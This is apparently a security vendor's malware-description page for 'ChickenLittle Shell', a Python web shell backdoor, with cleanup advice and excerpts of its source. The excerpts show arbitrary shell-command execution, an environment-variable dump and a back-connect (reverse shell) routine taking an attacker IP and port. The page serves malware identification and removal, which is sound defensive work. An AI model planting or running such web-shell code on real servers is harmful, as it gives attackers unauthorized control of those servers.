Backdoors are server-side malicious scripts which are intended to perpetrate malicious acccess to the server.
The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts without authorization.
Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside.
Server level analysis is necessary in case of infection by this type of malware.
ChickenLittle Shell is simple script that provides basic web shell functionality such as: file and networks operations and shell command execution. It is written in Python.
Affecting
Any server with installed Python. Outdated software or compromised passwords can act as an infection vector.
Cleanup
Inspect your server looking for any unknown python files and remove them. Note, usually .py files are not executable by webservers without proper configuration. To work this around, hackers usually add .py extension handlers
in .htaccess files. You should find such files and remove handlers that your site doesn't need. Alternatively, the files can be placed into special directories that allow execution of CGI scripts (e.g. cgi-bin). One some servers we found
this shell script with the .sh extension.
You can sign up with us and let our team remove the malware for you.
Dump
... excerpts ...
#!/usr/bin/python
"""
ChickenLittle Shell by Zep
"""
try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os, base64, subprocess
from time import strftime
from string import Template
bind_port =
...
html = Template("""
<html>
<head>
<title>ChickenLittle Shell</title>
...
<center><h2>=== ChickenLittle Shell ===</h2></center>
<a href="javascript:void(0)" onclick="javascript:toggleEnviron()">Show/Hide Environment variables</a>
$environ_table
<p />
<table width="100%">
<tr><td>
uname -a: $uname <br />
...
<td style="text-align:center"><b>(.)(.) [ChickenLittle Shell by Zep] (.)(.)</b></td>
</tr>
</table>
</body>
</html>
""")
scriptname = ""
if os.environ.has_key("SCRIPT_NAME"):
scriptname = os.environ["SCRIPT_NAME"]
def get_environ_table():
s = "<table style="display:none" id="environ_table">"
for k in os.environ:
s+="<tr><td>%s</td><td>%s</td></tr>"%(k,os.environ[k])
s+="</table>"
return s
def run_command(command):
p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
(i,o) = p.stdin,p.stdout
return o.read()
...
elif command == "back_connect":
port = get_param(form,"port")
ip = get_param(form,"ip")
file_name = put_script("bc",back_connect)
pid = subprocess.Popen(["python %s %s %s" % (file_name,ip,port)],shell=True).pid
command_result = "Process ID : %d " % pid
elif command != None:
command_result = run_command(command)
list_files = run_command("ls -alh " + cur_dir)
print html.substitute(environ_table=get_environ_table(),
uname = uname,
uid = uid,
list_files = list_files,
cur_dir = cur_dir,
command_result = command_result,
file_content = file_content,
file_name = file_name,
edit_file_box_visibility = edit_file_box_visibility
)
if __name__ == '__main__':
main()